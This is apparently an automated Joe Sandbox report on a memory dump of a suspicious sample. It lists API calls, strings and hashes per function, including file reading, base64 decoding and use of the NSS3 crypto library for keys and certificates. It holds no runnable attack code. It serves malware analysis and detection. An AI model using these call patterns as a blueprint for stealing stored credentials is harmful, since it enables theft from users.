PR_Unlock.NSS3(?), ref: 6BB5E57B
PR_SetError.NSS3(FFFFE001,00000000), ref: 6BB5E590
PR_Unlock.NSS3(?), ref: 6BB5E5BC
PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6BB5E5CA
TlsGetValue.KERNEL32 ref: 6BB5E5F2
EnterCriticalSection.KERNEL32(?), ref: 6BB5E606
PORT_Alloc_Util.NSS3(?), ref: 6BB5E613
PR_Unlock.NSS3(?), ref: 6BB5E682

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: UnlockValue$CriticalEnterErrorSection$Alloc_GenerateK11_RandomUtilfreememcpy
String ID:
API String ID: 199578966-0
Opcode ID: 540f6a6c88f14b21f71ebeab693f08c42c4164d7f9c9097bd8411b6bf852c6bc
Instruction ID: 1b12aba197c0d2e4f83fb0bdcb538744eccb0f88c3889f6e62b3c07b3ccb06be
Opcode Fuzzy Hash: 540f6a6c88f14b21f71ebeab693f08c42c4164d7f9c9097bd8411b6bf852c6bc
Instruction Fuzzy Hash: 79D1ABB2910244CFDB10DF68D884B9EB7F5FF09304F004569E856A7761E738E965CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00411F30 Relevance: 19.7, APIs: 13, Instructions: 193stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411F4E
memset.MSVCRT ref: 00411F65

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00411F9C
lstrcat.KERNEL32(?,04286730), ref: 00411FBB
lstrcat.KERNEL32(?,?), ref: 00411FCF
lstrcat.KERNEL32(?,04286CB8), ref: 00411FE3

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Part of subcall function 004096C0: StrStrA.SHLWAPI(00000000,04286B50), ref: 0040971B
Part of subcall function 004096C0: memcmp.MSVCRT ref: 00409774

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415AC0: GlobalAlloc.KERNEL32(00000000,00412087,00412087), ref: 00415AD3

StrStrA.SHLWAPI(?,04288848), ref: 0041209D
GlobalFree.KERNEL32(?), ref: 00412199

Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrcat.KERNEL32(?,00000000), ref: 0041212A
StrCmpCA.SHLWAPI(?,0041D4AB,?,?,?,?,000003E8), ref: 00412147
lstrcat.KERNEL32(00000000,00000000), ref: 00412159
lstrcat.KERNEL32(00000000,?), ref: 0041216C
lstrcat.KERNEL32(00000000,0041D840), ref: 0041217B

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcat$Local$AllocFile$Freememset$BinaryCryptGlobalStringmemcmp$AttributesChangeCloseCreateFindFolderNotificationPathReadSizelstrcpy
String ID:
API String ID: 3662689742-0
Opcode ID: f5db646830afb3b51793a6e0b6e4721c7518e8da438697001fa247f991728a2a
Instruction ID: d5c3215e2bd1f08faed5fb03d7604f0585b4cbbeb5c4b7daf79ee1030fe867fa
Opcode Fuzzy Hash: f5db646830afb3b51793a6e0b6e4721c7518e8da438697001fa247f991728a2a
Instruction Fuzzy Hash: B97158B6900618BBCB24EBE0DD49FDE7779AF88304F004599F60997181EA78DB94CF94

Uniqueness

Uniqueness Score: -1.00%

Function 6BC4ABB0 Relevance: 19.7, APIs: 13, Instructions: 173COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6BC4ABD5
_PR_MD_UNLOCK.NSS3(?), ref: 6BC4AC21

Part of subcall function 6BBF70F0: LeaveCriticalSection.KERNEL32(6BC40C7B), ref: 6BBF710D

EnterCriticalSection.KERNEL32(?), ref: 6BC4AC44
_PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6BC4AC6E
_PR_MD_UNLOCK.NSS3(?), ref: 6BC4AC97
EnterCriticalSection.KERNEL32(?), ref: 6BC4ACBF
PR_NewCondVar.NSS3(?), ref: 6BC4ACDB
_PR_MD_UNLOCK.NSS3(?), ref: 6BC4AD0D
PR_SetPollableEvent.NSS3(?), ref: 6BC4AD18
EnterCriticalSection.KERNEL32(?), ref: 6BC4AD31

Part of subcall function 6BBF9890: TlsGetValue.KERNEL32(?,?,?,6BBF97EB), ref: 6BBF989E

_PR_MD_UNLOCK.NSS3(?), ref: 6BC4AD89
PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6BC4AD98
_PR_MD_UNLOCK.NSS3(?), ref: 6BC4ADC5

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: CriticalSection$Enter$CondErrorEventLeavePollableValue
String ID:
API String ID: 829741924-0
Opcode ID: da7725d8ad7f7528659d227276232b46ded8894c768d39a07dbda0cd78f03b33
Instruction ID: 67d33a5977f7cd7b9a3df8504c6fcdf2dc93f35cdb376b7a8aed99c317bd6d9c
Opcode Fuzzy Hash: da7725d8ad7f7528659d227276232b46ded8894c768d39a07dbda0cd78f03b33
Instruction Fuzzy Hash: 71619FB28106109FC7109F25C88570AB7F8AF84719F158579E85A57722E739FA89CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6BB3A3F0 Relevance: 18.2, APIs: 12, Instructions: 228stringCOMMON

Download Yara Rule

APIs

PK11_FindCertFromNickname.NSS3(?,?), ref: 6BB3A448
PR_SetError.NSS3(FFFFE005,00000000), ref: 6BB3A4A4
strchr.VCRUNTIME140(?,00000040), ref: 6BB3A4B4
free.MOZGLUE(00000000), ref: 6BB3A4ED
TlsGetValue.KERNEL32 ref: 6BB3A530
EnterCriticalSection.KERNEL32(?), ref: 6BB3A544
PR_Unlock.NSS3(?), ref: 6BB3A560
EnterCriticalSection.KERNEL32(?), ref: 6BB3A5D4
PR_Unlock.NSS3(?), ref: 6BB3A5ED
TlsGetValue.KERNEL32 ref: 6BB3A5C0

Part of subcall function 6BB4FE20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,?), ref: 6BB4FE6A
Part of subcall function 6BB4FE20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,?), ref: 6BB4FE7E
Part of subcall function 6BB4FE20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,?), ref: 6BB4FE96
Part of subcall function 6BB4FE20: CERT_GetCertTrust.NSS3(?,?), ref: 6BB4FEB8

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$Cert$ErrorFindFromK11_NicknameTrustfreestrchr
String ID:
API String ID: 3246341897-0
Opcode ID: 6e6548244d72e7b61f290eba244d0fdac6730856e41ece5d421da4c6e1414669
Instruction ID: 11cc3ba3c4c53d4d49ad9574618866bbf1b8c79617c7eafb048586a87ff5a99a
Opcode Fuzzy Hash: 6e6548244d72e7b61f290eba244d0fdac6730856e41ece5d421da4c6e1414669
Instruction Fuzzy Hash: 6D71D4B5D006A0ABFF009F38EC45A6F77A8EF46714F154564EC19A7201FB39EA418EA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BB38320 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6BB38338

Part of subcall function 6BB910C0: TlsGetValue.KERNEL32(?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB910F3
Part of subcall function 6BB910C0: EnterCriticalSection.KERNEL32(?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB9110C
Part of subcall function 6BB910C0: PL_ArenaAllocate.NSS3(?,?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB91141
Part of subcall function 6BB910C0: PR_Unlock.NSS3(?,?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB91182
Part of subcall function 6BB910C0: TlsGetValue.KERNEL32(?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB9119C

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6BB38364

Part of subcall function 6BB90840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6BB908B4

PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6BB3838E

Part of subcall function 6BB910C0: PL_ArenaAllocate.NSS3(?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB9116E

memcpy.VCRUNTIME140(00000000,?,?), ref: 6BB383A5
PR_SetError.NSS3(FFFFE005,00000000), ref: 6BB383E3
PORT_ArenaAlloc_Util.NSS3(0000002A,00000001), ref: 6BB38420
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6BB38432
PORT_ArenaAlloc_Util.NSS3(0000002A,-00000001), ref: 6BB38480
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6BB384AB

Strings

imFcW.exeWjXthuJnkCLZpXUimFcW.exeWjXthuJnkCLZpXUimFcW.exeWjXthuJnkCLZpXUimFcW.exeWjXthuJnkCLZpXUimFcW.exeWjXthuJnkCLZpXUimFcW.exeWjXthuJnkCLZpXUimFcW.exeWjXthuJnkCLZpXUimFcW.exeWjXthuJnkCLZpXUimFcW.exeWjXthuJnkCLZpXUimFcW.exeWjXthuJnkCLZpXU, xrefs: 6BB383C5

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Arena$Util$Alloc_$AllocateErrorValuememcpy$CriticalEnterFindSectionTag_Unlockmemset
String ID: imFcW.exeWjXthuJnkCLZpXUimFcW.exeWjXthuJnkCLZpXUimFcW.exeWjXthuJnkCLZpXUimFcW.exeWjXthuJnkCLZpXUimFcW.exeWjXthuJnkCLZpXUimFcW.exeWjXthuJnkCLZpXUimFcW.exeWjXthuJnkCLZpXUimFcW.exeWjXthuJnkCLZpXUimFcW.exeWjXthuJnkCLZpXUimFcW.exeWjXthuJnkCLZpXU
API String ID: 2320994264-1774215216
Opcode ID: b9a9faa039b18f26b0fb46ea6b1300e9764669a0839393876e3a570d8e745b3a
Instruction ID: 1092962cf228bf105519db347973f68588974ed398c9333ce924094085a100a2
Opcode Fuzzy Hash: b9a9faa039b18f26b0fb46ea6b1300e9764669a0839393876e3a570d8e745b3a
Instruction Fuzzy Hash: BD41B4B2D102656FEB109F68DC82AAF7BA8EF04244F050025ED09E7341E739EA15CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6BBB6BA0 Relevance: 16.7, APIs: 11, Instructions: 248COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000159,?,?,?,?,?,?,?,6BBC0293), ref: 6BBB6BC2
PR_SetError.NSS3(FFFFD016,00000000), ref: 6BBB6C13
NSS_GetAlgorithmPolicy.NSS3(?), ref: 6BBB6C39
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6BBB6C6C
NSS_GetAlgorithmPolicy.NSS3(00000146,?), ref: 6BBB6CAB
PR_SetError.NSS3(FFFFD016,00000000), ref: 6BBB6CEE
PR_SetError.NSS3(FFFFD016,00000000), ref: 6BBB6D2A
PR_SetError.NSS3(FFFFD016,00000000), ref: 6BBB6D6D
PR_SetError.NSS3(FFFFD016,00000000), ref: 6BBB6DBD
PR_SetError.NSS3(FFFFD016,00000000), ref: 6BBB6E13
PR_SetError.NSS3(FFFFD016,00000000), ref: 6BBB6EE9

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Error$AlgorithmPolicy
String ID:
API String ID: 644051021-0
Opcode ID: 95d504cf6c201a60a329025741193e66ecd5c50d705146aceb3f731182f68c2c
Instruction ID: 798a008a5f30513d21ad5cae66a063fef995ca223691c556aa3e59b7af755ab9
Opcode Fuzzy Hash: 95d504cf6c201a60a329025741193e66ecd5c50d705146aceb3f731182f68c2c
Instruction Fuzzy Hash: D591A172D042C5CBEA10DB6CDC417B8B771DB42B28F1402A6D157AB2D2EB799E858352

Uniqueness

Uniqueness Score: -1.00%

Function 6BB90350 Relevance: 16.7, APIs: 11, Instructions: 161memorystringCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?), ref: 6BB9039A

Part of subcall function 6BB907B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6BB38298,?,?,?,6BB2FCE5,?), ref: 6BB907BF
Part of subcall function 6BB907B0: PL_HashTableLookup.NSS3(?,?), ref: 6BB907E6
Part of subcall function 6BB907B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6BB9081B
Part of subcall function 6BB907B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6BB90825

PR_SetError.NSS3(FFFFE005,00000000), ref: 6BB903D6
realloc.MOZGLUE(?,00000000), ref: 6BB90404
PORT_ArenaAlloc_Util.NSS3(00000020), ref: 6BB90431
SECITEM_CopyItem_Util.NSS3(00000000,?), ref: 6BB90457
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BB90477
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6BB90487
memcpy.VCRUNTIME140(00000000,?,?), ref: 6BB904A0
PL_NewHashTable.NSS3(00000000,6BB8FE80,?,?,00000000,00000000), ref: 6BB904DF
PL_HashTableAdd.NSS3(?,00000000,00000000), ref: 6BB904F3
PR_SetError.NSS3(FFFFE013,00000000), ref: 6BB9051F

Part of subcall function 6BB88970: TlsGetValue.KERNEL32(?,00000000,6BB361C4,?,6BB35639,00000000), ref: 6BB88991
Part of subcall function 6BB88970: TlsGetValue.KERNEL32(?,?,?,?,?,6BB35639,00000000), ref: 6BB889AD
Part of subcall function 6BB88970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6BB35639,00000000), ref: 6BB889C6
Part of subcall function 6BB88970: PR_WaitCondVar.NSS3 ref: 6BB889F7
Part of subcall function 6BB88970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6BB35639,00000000), ref: 6BB88A0C

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: ErrorHashTableUtil$Alloc_ArenaLookupValue$CondConstCopyCriticalEnterFindItem_SectionUnlockWaitmemcpyreallocstrlen
String ID:
API String ID: 1384229645-0
Opcode ID: 815853390c1750cecfaa22f9d8f1127eda2eacf5db9d4a41e5c15a04325914fd
Instruction ID: d7be1d3c62a97e141924eab11dfb4bcde9da792ff4c54889e3e9c54d1bed62dc
Opcode Fuzzy Hash: 815853390c1750cecfaa22f9d8f1127eda2eacf5db9d4a41e5c15a04325914fd
Instruction Fuzzy Hash: 3D51A1B1E043819FEB10EF69EC81B6A77B8FB06308F404139E91597341E738EA55CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6BC42AD0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 46stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6BC42AE8
strdup.MOZGLUE(00000000), ref: 6BC42AFA
PR_ExitMonitor.NSS3 ref: 6BC42B0B
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(LD_LIBRARY_PATH), ref: 6BC42B1E
strdup.MOZGLUE(.;\lib), ref: 6BC42B32
PR_ExitMonitor.NSS3 ref: 6BC42B4A
PR_SetError.NSS3(FFFFE890,00000000), ref: 6BC42B59

Strings

.;\lib, xrefs: 6BC42B29, 6BC42B31
LD_LIBRARY_PATH, xrefs: 6BC42B19

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Monitor$Exitstrdup$EnterErrorgetenv
String ID: .;\lib$LD_LIBRARY_PATH
API String ID: 2438426442-3838498337
Opcode ID: f5e2693e7478633d6ec14ae75d929592e086a3b8cf3f6006f7170765d73f976d
Instruction ID: d2b80f9bffe3ba2570bff7f14dc9e2998ec45b738d3d916806b2492215bf5923
Opcode Fuzzy Hash: f5e2693e7478633d6ec14ae75d929592e086a3b8cf3f6006f7170765d73f976d
Instruction Fuzzy Hash: 2D01A7B5E2416167FA117F789C17B1A377C9B1228CF040074DC0AD5212FB39DB29C697

Uniqueness

Uniqueness Score: -1.00%

Function 6BBCAB00 Relevance: 15.3, APIs: 10, Instructions: 293memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6BBCA6D0: PORT_ZAlloc_Util.NSS3(00000A38,00000000,?,6BBC80C1), ref: 6BBCA6F9
Part of subcall function 6BBCA6D0: memcpy.VCRUNTIME140(00000210,6BC90BEC,0000011C), ref: 6BBCA869

SECITEM_CopyItem_Util.NSS3(00000000,00000008,?,?,6BBC80AD), ref: 6BBCAB48

Part of subcall function 6BB8FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6BB88D2D,?,00000000,?), ref: 6BB8FB85
Part of subcall function 6BB8FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6BB8FBB1

PORT_Strdup_Util.NSS3(?,?,?,?,?,6BBC80AD), ref: 6BBCAB8E
PORT_Strdup_Util.NSS3(?,?,?,?,?,6BBC80AD), ref: 6BBCABA7
memcpy.VCRUNTIME140(?,00000210,0000011C,?,?,?,?,6BBC80AD), ref: 6BBCABFE
memcpy.VCRUNTIME140(?,000006AA,?,?,?,?,?,?,?,?,6BBC80AD), ref: 6BBCAC1C
memcpy.VCRUNTIME140(?,000006C0,?,?,?,?,?,?,?,?,?,?,?,6BBC80AD), ref: 6BBCAC48

Part of subcall function 6BBC5BC0: PR_EnterMonitor.NSS3(8B105D8B,?,?,6BBC80E3,00000000), ref: 6BBC5BD6
Part of subcall function 6BBC5BC0: PR_EnterMonitor.NSS3(840FC085,?,?,6BBC80E3,00000000), ref: 6BBC5BED
Part of subcall function 6BBC5BC0: PR_EnterMonitor.NSS3(07890478,?,?,6BBC80E3,00000000), ref: 6BBC5C04
Part of subcall function 6BBC5BC0: PR_EnterMonitor.NSS3(000000F4,?,?,6BBC80E3,00000000), ref: 6BBC5C1B
Part of subcall function 6BBC5BC0: PR_Unlock.NSS3(0140BCE8,?,?,6BBC80E3,00000000), ref: 6BBC5C4C
Part of subcall function 6BBC5BC0: PR_Unlock.NSS3(08C48300,?,?,6BBC80E3,00000000), ref: 6BBC5C5F
Part of subcall function 6BBC5BC0: PR_ExitMonitor.NSS3(8B105D8B,?,?,6BBC80E3,00000000), ref: 6BBC5C76
Part of subcall function 6BBC5BC0: PR_ExitMonitor.NSS3(840FC085,?,?,6BBC80E3,00000000), ref: 6BBC5C8D
Part of subcall function 6BBC5BC0: PR_ExitMonitor.NSS3(07890478,?,?,6BBC80E3,00000000), ref: 6BBC5CA4
Part of subcall function 6BBC5BC0: PR_ExitMonitor.NSS3(000000F4,?,?,6BBC80E3,00000000), ref: 6BBC5CBB

PORT_ZAlloc_Util.NSS3(00000010,?,?,?,?,?,?,?,?,?,?,?,?,?,6BBC80AD), ref: 6BBCACED

Part of subcall function 6BB90D30: calloc.MOZGLUE ref: 6BB90D50
Part of subcall function 6BB90D30: TlsGetValue.KERNEL32 ref: 6BB90D6D

PORT_ZAlloc_Util.NSS3(0000001C,?,?,?,?,?,?,?,?,?,?,?,?,?,6BBC80AD), ref: 6BBCAD52
SECKEY_CopyPrivateKey.NSS3(?), ref: 6BBCAEE5
SECKEY_CopyPublicKey.NSS3(?), ref: 6BBCAEFC

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Monitor$Util$memcpy$Alloc_EnterExit$Copy$Strdup_Unlock$ArenaItem_PrivatePublicValuecalloc
String ID:
API String ID: 3422837898-0
Opcode ID: 85cc5416a763968eb51b84c2a7253d6907210f3b63f398a93b591fc88fe9c75d
Instruction ID: aa7121996ffd29c8027061c3a6bb288542e391653b73cf42852b26225b5446a7
Opcode Fuzzy Hash: 85cc5416a763968eb51b84c2a7253d6907210f3b63f398a93b591fc88fe9c75d
Instruction Fuzzy Hash: CED1D8B5A002428FDB44CF28C481BAAB7E5FB48314F0942B9DD1DDB746E734A994CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BBB83B0 Relevance: 13.6, APIs: 9, Instructions: 132memorythreadCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6BBB83F0

Part of subcall function 6BB90840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6BB908B4

SECITEM_AllocItem_Util.NSS3(00000000,?,?), ref: 6BBB840E

Part of subcall function 6BB8F9A0: PORT_ArenaMark_Util.NSS3(?,00000000,-00000002,?,-00000002,?,6BB2F379,?,00000000,-00000002), ref: 6BB8F9B7

memcpy.VCRUNTIME140(?,?,?), ref: 6BBB843D

Part of subcall function 6BB42C70: PK11_GenerateKeyPairWithOpFlags.NSS3(00000000,00001040,?,?,0000008A,00080000,00080800,?,?,?,?,?,?,?,?), ref: 6BB42CC1
Part of subcall function 6BB42C70: PK11_GenerateKeyPairWithOpFlags.NSS3(00000000,00001040,?,?,00000046,00080000,00080800,?), ref: 6BB42CE8

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6BBB8461

Part of subcall function 6BB8FAB0: free.MOZGLUE(?,-00000001,?,?,6BB2F673,00000000,00000000), ref: 6BB8FAC7

Part of subcall function 6BBC9B50: PORT_ZAlloc_Util.NSS3 ref: 6BBC9B73
Part of subcall function 6BBC9B50: PORT_ZAlloc_Util.NSS3 ref: 6BBC9B96

PR_SetError.NSS3(FFFFE08D,00000000), ref: 6BBB8494
